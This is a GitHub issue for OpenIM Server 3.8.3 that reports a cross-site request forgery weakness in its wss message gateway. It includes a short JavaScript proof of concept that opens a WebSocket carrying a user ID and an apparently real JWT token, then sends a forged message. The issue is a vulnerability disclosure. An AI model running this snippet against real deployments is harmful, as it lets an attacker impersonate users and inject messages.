[BUG] The WSS protocol has a cross site request forgery vulnerability #3318

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Open

jinquanbao opened this issue May 7, 2025 · 1 comment

Labels

bug

jinquanbao commented May 7, 2025

OpenIM Server Version

3.8.3

Operating System and CPU Architecture

Linux (AMD)

Deployment Method

Source Code Deployment

Bug Description and Steps to Reproduce

wss协议存在跨站请求伪造漏洞

1、编写js脚本：

<script> const ws = new WebSocket('wss://domain/msg_gateway?compression=gzip&isBackground=false&isMsgResp=true&operationID=1746588237155792797&platformID=5&sendID=20731663401504&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySUQiOiIyMDczMTY2MzQwMTUwNCIsIlBsYXRmb3JtSUQiOjUsImV4cCI6MTc1NDM2NDIzNSwiaWF0IjoxNzQ2NTg4MjMwfQ.Pfuy14Od359sQc6HXdyvX7oYeHGh9miJAKFKP2t7b0I'); ws.onopen = () => ws.send("试探性消息"); ws.onmessage = (e) => console.log("收到响应:", e.data); </script>

发起攻击，发现成功链接，并发送了攻击者伪造信息。

Screenshots Link

No response

jinquanbao added the bug label

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment